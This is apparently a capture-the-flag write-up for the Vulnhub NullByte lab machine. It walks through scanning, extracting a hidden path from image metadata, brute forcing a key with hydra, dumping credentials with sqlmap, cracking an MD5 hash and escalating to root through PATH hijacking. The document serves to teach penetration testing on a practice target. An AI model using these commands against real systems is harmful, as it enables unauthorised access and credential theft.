Vulnhub NullByte Writeup

Vulnhub NullByte Writeup
Vulnhub NullByte writeup

Vulnhub NullByte Writeup will walk you through the techniques required to root the box and capture the flag, those techniques include:

– Scanning
– Extract hidden data from image
– Brute force HTTP post form with hydra
– SQL injection with sqlmap
– Exploit PATH Environment Variables

Now, Download the machine from vulnhub and export it to VMWare Workstation or VirtualBox, check its IP and get your hands ready.

1. Scanning:

As always, start with nmap scan:

# nmap -A -p- 10.10.0.137

NullByte nmap scan

Found Ports: HTTP, SSH on port 777, rpcbind tcp/111

Web enumeration didn’t show intersting data:

web enum with dirb

Browse http://10.10.0.137/ and view it source.

Only an image is there, download it and examine if it has some hidden data with exiftool.

2. Extract hidden data in image:

# exiftool main.gif

extract hidden data  from image

Found something interesting kzMb5nVYJw

Is it a password, or a directory or else!! Let’s try:

Yes it is a directory http://10.10.0.137/kzMb5nVYJw/

key needed

page source

that needs a key to continue, what about brute force with hydra!!

3. Brute force HTTP post form with hydra:

# hydra -l “” -P /usr/share/wordlists/dirb/big.txt 10.10.0.137 http-post-form “/kzMb5nVYJw/index.php:key=^PASS^&Login=Login:invalid key”

brute force http post form with hydra

A key was found “elite“, use it, and we have another input field asking for username.

4. SQL injection with sqlmap:

SQLi vulnarblity

After trials and errors, I found it vulnerable to SQL injection, move to our good friend sqlmap:

1- Extract  Databases –dbs :

# sqlmap -u http://10.10.0.137/kzMb5nVYJw/420search.php?usrtosearch=horus –dbs

2- select a database with -D <DB Name> and extract its tables:
# sqlmap -u http://10.10.0.137/kzMb5nVYJw/420search.php?usrtosearch=horus -D seth –tables

3- Select the interesting table with -T <Table Name> and check its columns:
# sqlmap -u http://10.10.0.137/kzMb5nVYJw/420search.php?usrtosearch=horus -D seth -T users –columns

4- Dump the data for the interesting columns from a table in specific DB:
# sqlmap -u http://10.10.0.137/kzMb5nVYJw/420search.php?usrtosearch=horus -D seth -T users -C user,pass –dump

user hash

Got user ramses with password hash, seems base64 encoded.

Base64 decoding:

# echo YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE= | base64 -d

After decoding, It result in MD5: c6d6bd7ebf806f43c76acc3681703b81

MD5 Crack:

Using online MD5 cracker:

https://hashtoolkit.com/reverse-md5-hash/

Found a result:
c6d6bd7ebf806f43c76acc3681703b81 : omega

MD5 crack

5. Gaining Foothold shell:

Now we back to SSH with the collected credentials [ramses:omega]

That is fantastic, we are in,  again lets do more enumeration.

We have interesting directory called backup in /var/www/ which include a binary file called procwatch.

Running that binary shows a result like if it is PS command (a command that list running processes) and running with higher privileges !!

# ssh ramses@10.10.0.137 -p 777
$ cd /var/www/backup/
$ ./procwatch

6. Exploit Environment Variables:

So, if it is using the command PS , what if we can exploit environment variables and use our abused copy of PS in local path,

Then edit PATH variable to include our local path at the beginning!!

7. Root the box to Capture the Flag:

So, I am going to link the /bin/sh command to a local file named PS

Then add the current path to the $PATH environment variable, so when we try to run the procwatch binary , it will search for the command PS in the configured $PATH variable paths, It will find a match within the first  path  (our abused version of PS which is a link to /bin/sh).

So we should get a shell with the same privilege as procwatch binary, let’s see.

$ ln -s /bin/sh ps
$ export PATH=`pwd`:${PATH}
$ ./procwatch
# whoami
root
# cat /root/proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

capture the flag root

And we Got the root flag!

Congratulations.

Comments are closed.